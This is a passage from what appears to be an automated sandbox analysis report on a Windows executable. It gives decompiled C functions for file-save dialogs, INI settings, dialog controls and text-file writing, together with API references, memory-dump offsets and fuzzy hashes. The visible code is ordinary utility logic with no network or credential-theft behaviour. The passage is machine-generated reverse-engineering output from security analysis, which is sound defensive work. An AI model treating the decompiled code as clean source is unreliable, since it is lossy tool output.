                                                                                                                                                      0x0040ac3c
                                                                                                                                                      0x0040ac44
                                                                                                                                                      0x0040ac71

                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 0040AB90
                                                                                                                                                        • Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,0000000B,0040799E,00000000,00000000), ref: 00406866
                                                                                                                                                        • Part of subcall function 00406827: LoadStringW.USER32(00000000,004120C0,00000FFF,?), ref: 004068FF
                                                                                                                                                        • Part of subcall function 00406827: memcpy.MSVCRT ref: 0040693F
                                                                                                                                                        • Part of subcall function 00406827: wcscpy.MSVCRT ref: 004068A8
                                                                                                                                                        • Part of subcall function 00406827: wcslen.MSVCRT ref: 004068C6
                                                                                                                                                        • Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,?,0000000B,0040799E,00000000,00000000), ref: 004068D4
                                                                                                                                                        • Part of subcall function 00406050: memset.MSVCRT ref: 00406071
                                                                                                                                                        • Part of subcall function 00406050: _snwprintf.MSVCRT ref: 0040609F
                                                                                                                                                        • Part of subcall function 00406050: wcslen.MSVCRT ref: 004060AB
                                                                                                                                                        • Part of subcall function 00406050: memcpy.MSVCRT ref: 004060C3
                                                                                                                                                        • Part of subcall function 00406050: wcslen.MSVCRT ref: 004060D1
                                                                                                                                                        • Part of subcall function 00406050: memcpy.MSVCRT ref: 004060E4
                                                                                                                                                        • Part of subcall function 00405DCD: GetSaveFileNameW.COMDLG32(?), ref: 00405E1C
                                                                                                                                                        • Part of subcall function 00405DCD: wcscpy.MSVCRT ref: 00405E33
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpywcslen$HandleModulememsetwcscpy$FileLoadNameSaveString_snwprintf
                                                                                                                                                      • String ID: *.htm;*.html$*.txt$txt
                                                                                                                                                      • API String ID: 1392923015-1706329710
                                                                                                                                                      • Opcode ID: 9ddafcd3e3873cef2600ad60d320d0a67768a4cae7d1907286cd4c839e47c819
                                                                                                                                                      • Instruction ID: 6a1f0fe5a8f9a0d06c10808573add6bd6f8ed95605c5985f6cf117c7f3196cfa
                                                                                                                                                      • Opcode Fuzzy Hash: 9ddafcd3e3873cef2600ad60d320d0a67768a4cae7d1907286cd4c839e47c819
                                                                                                                                                      • Instruction Fuzzy Hash: 5C215EB2D0121A9FCB40EF96D885ADDBBB4FF04308F10807BE409B7281DB7859418F99
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00406613, Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                      			E00406613(void** __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _t21;
				signed int _t23;
				void* _t24;
				signed int _t31;
				void* _t33;
				void* _t44;
				signed int _t46;
				void* _t48;
				signed int _t51;
				int _t52;
				void** _t53;
				void* _t58;

				_t53 = __esi;
				_t1 =  &(_t53[1]); // 0x0
				_t51 =  *_t1;
				_t21 = 0;
				if(_t51 <= 0) {
					L4:
					_t2 =  &(_t53[2]); // 0x8
					_t33 =  *_t53;
					_t23 =  *_t2 + _t51;
					_t46 = 8;
					_t53[1] = _t23;
					_t24 = _t23 * _t46;
					_push( ~(0 | _t58 > 0x00000000) | _t24);
					L0040E038();
					_t10 =  &(_t53[1]); // 0x0
					 *_t53 = _t24;
					memset(_t24, 0,  *_t10 << 3);
					_t52 = _t51 << 3;
					memcpy( *_t53, _t33, _t52);
					if(_t33 != 0) {
						_push(_t33);
						L0040E032();
					}
					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
				} else {
					_t44 =  *__esi;
					_t48 = _t44;
					while( *_t48 != 0) {
						_t21 = _t21 + 1;
						_t48 = _t48 + 8;
						_t58 = _t21 - _t51;
						if(_t58 < 0) {
							continue;
						} else {
							goto L4;
						}
						goto L7;
					}
					_t31 = _t21 << 3;
					 *((intOrPtr*)(_t44 + _t31)) = _a4;
					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
				}
				L7:
				return 1;
			}















                                                                                                                                                      0x00406613
                                                                                                                                                      0x00406614
                                                                                                                                                      0x00406614
                                                                                                                                                      0x00406617
                                                                                                                                                      0x0040661b
                                                                                                                                                      0x0040662e
                                                                                                                                                      0x0040662e
                                                                                                                                                      0x00406632
                                                                                                                                                      0x00406634
                                                                                                                                                      0x0040663a
                                                                                                                                                      0x0040663b
                                                                                                                                                      0x0040663e
                                                                                                                                                      0x00406647
                                                                                                                                                      0x00406648
                                                                                                                                                      0x0040664d
                                                                                                                                                      0x00406657
                                                                                                                                                      0x00406659
                                                                                                                                                      0x0040665e
                                                                                                                                                      0x00406665
                                                                                                                                                      0x0040666f
                                                                                                                                                      0x00406671
                                                                                                                                                      0x00406672
                                                                                                                                                      0x00406677
                                                                                                                                                      0x0040667e
                                                                                                                                                      0x00406687
                                                                                                                                                      0x0040661d
                                                                                                                                                      0x0040661d
                                                                                                                                                      0x0040661f
                                                                                                                                                      0x00406621
                                                                                                                                                      0x00406626
                                                                                                                                                      0x00406627
                                                                                                                                                      0x0040662a
                                                                                                                                                      0x0040662c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040662c
                                                                                                                                                      0x00406697
                                                                                                                                                      0x0040669a
                                                                                                                                                      0x004066a3
                                                                                                                                                      0x004066a3
                                                                                                                                                      0x0040668c
                                                                                                                                                      0x00406690

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??2@??3@memcpymemset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1865533344-0
                                                                                                                                                      • Opcode ID: b3bebb2b07f3d72bfc287334a96ab2eb9d003ca0e48cb49cfb9246c624c4ecc5
                                                                                                                                                      • Instruction ID: 0097541d92ab95bcfef6608398cdc2c51d263adba4e227b481c9d82b5fae792d
                                                                                                                                                      • Opcode Fuzzy Hash: b3bebb2b07f3d72bfc287334a96ab2eb9d003ca0e48cb49cfb9246c624c4ecc5
                                                                                                                                                      • Instruction Fuzzy Hash: EB114C716046019FD328DF2DC881A26F7E9EFD8300B218D3EE59A97395DA76E811CB64
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040D5E8, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 35%
                                                                                                                                                      			E0040D5E8(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr _a16, WCHAR* _a20) {
				char _v16390;
				short _v16392;
				void* __edi;
				intOrPtr* _t30;
				intOrPtr* _t34;
				signed int _t36;
				signed int _t37;

				_t30 = __ecx;
				E0040E340(0x4004, __ecx);
				_push(0x4000);
				_push(0);
				_v16392 = 0;
				_t34 = _t30;
				_push( &_v16390);
				if(_a4 == 0) {
					memset();
					GetPrivateProfileStringW(_a8, _a12, 0x40f454,  &_v16392, 0x2000, _a20);
					asm("sbb esi, esi");
					_t37 =  ~_t36;
					E00405F0A( &_v16392, _t34, _a16);
				} else {
					memset();
					E00405E81(_a16,  *_t34,  &_v16392);
					_t37 = WritePrivateProfileStringW(_a8, _a12,  &_v16392, _a20);
				}
				return _t37;
			}










                                                                                                                                                      0x0040d5e8
                                                                                                                                                      0x0040d5f0
                                                                                                                                                      0x0040d5fc
                                                                                                                                                      0x0040d601
                                                                                                                                                      0x0040d602
                                                                                                                                                      0x0040d60f
                                                                                                                                                      0x0040d611
                                                                                                                                                      0x0040d612
                                                                                                                                                      0x0040d647
                                                                                                                                                      0x0040d669
                                                                                                                                                      0x0040d676
                                                                                                                                                      0x0040d67f
                                                                                                                                                      0x0040d681
                                                                                                                                                      0x0040d614
                                                                                                                                                      0x0040d614
                                                                                                                                                      0x0040d625
                                                                                                                                                      0x0040d643
                                                                                                                                                      0x0040d643
                                                                                                                                                      0x0040d68d

                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 0040D614
                                                                                                                                                        • Part of subcall function 00405E81: _snwprintf.MSVCRT ref: 00405EC6
                                                                                                                                                        • Part of subcall function 00405E81: memcpy.MSVCRT ref: 00405ED6
                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0040D63D
                                                                                                                                                      • memset.MSVCRT ref: 0040D647
                                                                                                                                                      • GetPrivateProfileStringW.KERNEL32 ref: 0040D669
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1127616056-0
                                                                                                                                                      • Opcode ID: 1ef896f5ac476238214e2e7a1c8d83b09bc725c3f104deaf738d1964be3b1b7d
                                                                                                                                                      • Instruction ID: e5ada5cee961c9ffd84a11649d97ac6ffa4cf685c3efd691eec2e39df5646265
                                                                                                                                                      • Opcode Fuzzy Hash: 1ef896f5ac476238214e2e7a1c8d83b09bc725c3f104deaf738d1964be3b1b7d
                                                                                                                                                      • Instruction Fuzzy Hash: D5118272500119AFDF11AF65DC02E9E7B79EF04704F100476FF09B20A1E6359A649F9D
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00402B94, Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00402B94(struct HWND__* _a4, int _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20) {
				signed int _v32;
				void _v48;
				void* _v52;
				int _v68;
				intOrPtr _v72;
				signed int _v80;
				int _v92;
				void _v96;
				void* _v100;
				signed int _t34;

				memset( &_v96, 0, 0x2c);
				_v100 = _a12;
				_v80 = _a16;
				_v72 = _a20;
				_v96 = 0;
				_v92 = 0;
				_v68 = 0;
				memset( &_v48, 0, 0x2c);
				_v52 = 4;
				if(SendMessageW(_a4, 0x120b, _a8,  &_v52) != 0) {
					_t34 = _v32 & 0x00000003;
					if(_t34 != 0) {
						_v80 = _v80 & 0xfffffffc | _t34;
					}
				}
				return SendMessageW(_a4, 0x120c, _a8,  &_v100);
			}













                                                                                                                                                      0x00402ba8
                                                                                                                                                      0x00402bb0
                                                                                                                                                      0x00402bb7
                                                                                                                                                      0x00402bc0
                                                                                                                                                      0x00402bca
                                                                                                                                                      0x00402bce
                                                                                                                                                      0x00402bd2
                                                                                                                                                      0x00402bd6
                                                                                                                                                      0x00402bec
                                                                                                                                                      0x00402c00
                                                                                                                                                      0x00402c06
                                                                                                                                                      0x00402c09
                                                                                                                                                      0x00402c14
                                                                                                                                                      0x00402c14
                                                                                                                                                      0x00402c09
                                                                                                                                                      0x00402c2e

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSendmemset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 568519121-0
                                                                                                                                                      • Opcode ID: 3dbf91b2b69beef7f82be7727ae9dd33bc881aaf68ef105acbafed814d97d997
                                                                                                                                                      • Instruction ID: b9af20001e59f3bd0701389c088e4a3ca17ea943e2d6bc3205c17ab3910d7cc1
                                                                                                                                                      • Opcode Fuzzy Hash: 3dbf91b2b69beef7f82be7727ae9dd33bc881aaf68ef105acbafed814d97d997
                                                                                                                                                      • Instruction Fuzzy Hash: 61115B72508314ABD711DF14CC0199FBFE8EB89750F004A2AFA64E7290D371DA20CB96
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040A3BF, Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 47%
                                                                                                                                                      			E0040A3BF(void* __esi) {
				void* _v516;
				long _v1028;
				void* __ebx;
				wchar_t* _t15;
				signed short _t23;
				signed short _t25;
				void* _t29;

				_t29 = __esi;
				_push(E0040778A( *((intOrPtr*)(__esi + 0x69c))));
				_t23 = 4;
				_push(E00406827(_t23));
				_push(0xff);
				_push( &_v516);
				L0040DFD6();
				_t15 = E00407E16( *((intOrPtr*)(__esi + 0x69c)), 0);
				if(_t15 > 0) {
					_push(_t15);
					_t25 = 5;
					_push(E00406827(_t25));
					_push(0xff);
					_push( &_v1028);
					L0040DFD6();
					_t15 = wcscat( &_v516,  &_v1028);
				}
				if( *((intOrPtr*)(_t29 + 0x208)) != 0) {
					return SendMessageW( *(_t29 + 0x214), 0x40b, 0,  &_v516);
				}
				return _t15;
			}










                                                                                                                                                      0x0040a3bf
                                                                                                                                                      0x0040a3d5
                                                                                                                                                      0x0040a3d8
                                                                                                                                                      0x0040a3de
                                                                                                                                                      0x0040a3ea
                                                                                                                                                      0x0040a3eb
                                                                                                                                                      0x0040a3ec
                                                                                                                                                      0x0040a3fc
                                                                                                                                                      0x0040a403
                                                                                                                                                      0x0040a405
                                                                                                                                                      0x0040a408
                                                                                                                                                      0x0040a40e
                                                                                                                                                      0x0040a415
                                                                                                                                                      0x0040a416
                                                                                                                                                      0x0040a417
                                                                                                                                                      0x0040a42a
                                                                                                                                                      0x0040a42f
                                                                                                                                                      0x0040a43b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040a451
                                                                                                                                                      0x0040a458

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,0000000B,0040799E,00000000,00000000), ref: 00406866
                                                                                                                                                        • Part of subcall function 00406827: LoadStringW.USER32(00000000,004120C0,00000FFF,?), ref: 004068FF
                                                                                                                                                        • Part of subcall function 00406827: memcpy.MSVCRT ref: 0040693F
                                                                                                                                                      • _snwprintf.MSVCRT ref: 0040A3EC
                                                                                                                                                      • SendMessageW.USER32(?,0000040B,00000000,?), ref: 0040A451
                                                                                                                                                        • Part of subcall function 00406827: wcscpy.MSVCRT ref: 004068A8
                                                                                                                                                        • Part of subcall function 00406827: wcslen.MSVCRT ref: 004068C6
                                                                                                                                                        • Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,?,0000000B,0040799E,00000000,00000000), ref: 004068D4
                                                                                                                                                      • _snwprintf.MSVCRT ref: 0040A417
                                                                                                                                                      • wcscat.MSVCRT ref: 0040A42A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 822687973-0
                                                                                                                                                      • Opcode ID: fa48f0b94a06f49b58a326b4bcc618fa866d7abdeda14d17ebe30566094cc372
                                                                                                                                                      • Instruction ID: d08295fd2af1cf787610e7cf5331bd4bc3d6faa59d3d329b1d8aec9a5db4e45c
                                                                                                                                                      • Opcode Fuzzy Hash: fa48f0b94a06f49b58a326b4bcc618fa866d7abdeda14d17ebe30566094cc372
                                                                                                                                                      • Instruction Fuzzy Hash: 5C01D8B29003096AE720F275CC8AFA773ACAB40318F00447EB71AF10C2D679A9154A6D
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040576B, Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040576B(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				long _v8;
				long _v12;
				long _t13;
				void* _t14;
				struct HWND__* _t24;

				_t24 = GetDlgItem(_a4, _a8);
				_t13 = SendMessageW(_t24, 0x146, 0, 0);
				_v12 = _t13;
				_v8 = 0;
				if(_t13 <= 0) {
					L3:
					_t14 = 0;
				} else {
					while(SendMessageW(_t24, 0x150, _v8, 0) != _a12) {
						_v8 = _v8 + 1;
						if(_v8 < _v12) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
					SendMessageW(_t24, 0x14e, _v8, 0);
					_t14 = 1;
				}
				L4:
				return _t14;
			}








                                                                                                                                                      0x00405789
                                                                                                                                                      0x00405791
                                                                                                                                                      0x00405795
                                                                                                                                                      0x00405798
                                                                                                                                                      0x0040579b
                                                                                                                                                      0x004057b9
                                                                                                                                                      0x004057b9
                                                                                                                                                      0x0040579d
                                                                                                                                                      0x0040579d
                                                                                                                                                      0x004057ae
                                                                                                                                                      0x004057b7
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004057b7
                                                                                                                                                      0x004057ca
                                                                                                                                                      0x004057ce
                                                                                                                                                      0x004057ce
                                                                                                                                                      0x004057bb
                                                                                                                                                      0x004057bf

                                                                                                                                                      APIs
                                                                                                                                                      • GetDlgItem.USER32 ref: 00405779
                                                                                                                                                      • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00405791
                                                                                                                                                      • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 004057A7
                                                                                                                                                      • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 004057CA
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend$Item
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3888421826-0
                                                                                                                                                      • Opcode ID: 84320e977df6a92d9295fdec2ba4224318a32ded31fcf9cf43a568e2f97b542c
                                                                                                                                                      • Instruction ID: ea6b6bb6de5f5fc2c04e1b050f2a77b7acc78c850c927156145779c4c3b5f003
                                                                                                                                                      • Opcode Fuzzy Hash: 84320e977df6a92d9295fdec2ba4224318a32ded31fcf9cf43a568e2f97b542c
                                                                                                                                                      • Instruction Fuzzy Hash: FEF01975A0010CFFEB119F95CDC5DAFBBB9EB49794F20447AFA04E6150D2709E01AA64
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00402F8E, Relevance: 6.0, APIs: 4, Instructions: 46windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 85%
                                                                                                                                                      			E00402F8E(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags) {
				struct HWND__* _t16;
				intOrPtr* _t36;
				intOrPtr* _t47;
				void* _t48;
				intOrPtr* _t49;

				_t40 = __edx;
				_push(__ebx);
				_t47 = __ecx;
				E00401712( *((intOrPtr*)(__ecx + 0x10)), __edx, __ecx + 0x40, __eflags);
				E0040DB6F(GetDlgItem( *(_t47 + 0x10), 0x3f1));
				SetFocus(GetDlgItem( *(_t47 + 0x10), 0x3ee));
				_t16 = GetDlgItem( *(_t47 + 0x10), 0x3ee);
				E00405700(_t16, E00406827(0x3b7), 1);
				E00405700(_t16, E00406827(0x3b8), 2);
				E0040300B(_t47);
				_t36 = _t47;
				_pop(_t48);
				_t49 = _t36;
				 *((intOrPtr*)( *_t49 + 4))(1, _t48);
				 *((intOrPtr*)( *_t49 + 0x1c))();
				E00405B17(_t40,  *((intOrPtr*)(_t49 + 0x10)), 4);
				return 0;
			}








                                                                                                                                                      0x00402f8e
                                                                                                                                                      0x00402f8e
                                                                                                                                                      0x00402f90
                                                                                                                                                      0x00402f99
                                                                                                                                                      0x00402faf
                                                                                                                                                      0x00402fc2
                                                                                                                                                      0x00402fcc
                                                                                                                                                      0x00402fdc
                                                                                                                                                      0x00402ff2
                                                                                                                                                      0x00402ffc
                                                                                                                                                      0x00403002
                                                                                                                                                      0x00403004
                                                                                                                                                      0x0040165a
                                                                                                                                                      0x00401660
                                                                                                                                                      0x00401667
                                                                                                                                                      0x0040166f
                                                                                                                                                      0x00401679

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00401712: GetClientRect.USER32 ref: 0040171E
                                                                                                                                                        • Part of subcall function 00401712: GetWindow.USER32(?,00000005), ref: 00401737
                                                                                                                                                        • Part of subcall function 00401712: GetWindow.USER32(00000000), ref: 0040173A
                                                                                                                                                        • Part of subcall function 00401712: GetWindow.USER32(00000000,00000002), ref: 0040174C
                                                                                                                                                      • GetDlgItem.USER32 ref: 00402FAC
                                                                                                                                                        • Part of subcall function 0040DB6F: LoadLibraryW.KERNEL32(shlwapi.dll,770B48C0,?,00402FB4,00000000), ref: 0040DB78
                                                                                                                                                        • Part of subcall function 0040DB6F: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0040DB86
                                                                                                                                                        • Part of subcall function 0040DB6F: FreeLibrary.KERNEL32(00000000,?,00402FB4,00000000), ref: 0040DB9E
                                                                                                                                                      • GetDlgItem.USER32 ref: 00402FBF
                                                                                                                                                      • SetFocus.USER32(00000000), ref: 00402FC2
                                                                                                                                                      • GetDlgItem.USER32 ref: 00402FCC
                                                                                                                                                        • Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,0000000B,0040799E,00000000,00000000), ref: 00406866
                                                                                                                                                        • Part of subcall function 00406827: LoadStringW.USER32(00000000,004120C0,00000FFF,?), ref: 004068FF
                                                                                                                                                        • Part of subcall function 00406827: memcpy.MSVCRT ref: 0040693F
                                                                                                                                                        • Part of subcall function 00405700: SendMessageW.USER32(?,00000143,00000000,?), ref: 00405717
                                                                                                                                                        • Part of subcall function 00405700: SendMessageW.USER32(?,00000151,00000000,?), ref: 00405729
                                                                                                                                                        • Part of subcall function 00406827: wcscpy.MSVCRT ref: 004068A8
                                                                                                                                                        • Part of subcall function 00406827: wcslen.MSVCRT ref: 004068C6
                                                                                                                                                        • Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,?,0000000B,0040799E,00000000,00000000), ref: 004068D4
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ItemWindow$HandleLibraryLoadMessageModuleSend$AddressClientFocusFreeProcRectStringmemcpywcscpywcslen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2946568780-0
                                                                                                                                                      • Opcode ID: 52cbf3b4b279be617207ad7872dd7437349133491b3365fd1e852972f4b5ad5a
                                                                                                                                                      • Instruction ID: 30f591fb8b2f5730a97996d02f89d272a17373ddbf4734e32a48e8550da6c286
                                                                                                                                                      • Opcode Fuzzy Hash: 52cbf3b4b279be617207ad7872dd7437349133491b3365fd1e852972f4b5ad5a
                                                                                                                                                      • Instruction Fuzzy Hash: 46F0C8B2A00700E7D22177B6AC46E2B76ACEF84719F06093EF541F71D2CA799D055658
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040877D, Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                      			E0040877D(void* __ecx, void* __eflags, void* _a4, short* _a8) {
				long _v8;
				void _v32775;
				char _v32776;

				E0040E340(0x8004, __ecx);
				_v32776 = 0;
				memset( &_v32775, 0, 0x7fff);
				WideCharToMultiByte(0xfde9, 0, _a8, 0xffffffff,  &_v32776, 0x7fff, 0, 0);
				return WriteFile(_a4,  &_v32776, strlen( &_v32776),  &_v8, 0);
			}






                                                                                                                                                      0x00408785
                                                                                                                                                      0x0040879c
                                                                                                                                                      0x004087a2
                                                                                                                                                      0x004087bf
                                                                                                                                                      0x004087eb

                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 004087A2
                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000003,000000FF,?,00007FFF,00000000,00000000), ref: 004087BF
                                                                                                                                                      • strlen.MSVCRT ref: 004087D1
                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,00000001,00000000), ref: 004087E2
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2754987064-0
                                                                                                                                                      • Opcode ID: 51ae4e62cfb9bf55f12b25eeafec9d01389194143adb00a77a57f99ffa8f8497
                                                                                                                                                      • Instruction ID: be2e12bba75bd4d95a24d89f44609daf6c821d09d66759c01e9b41f40a714cd1
                                                                                                                                                      • Opcode Fuzzy Hash: 51ae4e62cfb9bf55f12b25eeafec9d01389194143adb00a77a57f99ffa8f8497
                                                                                                                                                      • Instruction Fuzzy Hash: 66F062B640112CBEEB91AB95DD81DEB776CEB04258F0045B2B705E6180D974AE484F7C
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 004087EC, Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                      			E004087EC(void* __ecx, void* __eflags, void* _a4, short* _a8) {
				long _v8;
				void _v8199;
				char _v8200;

				E0040E340(0x2004, __ecx);
				_v8200 = 0;
				memset( &_v8199, 0, 0x1fff);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
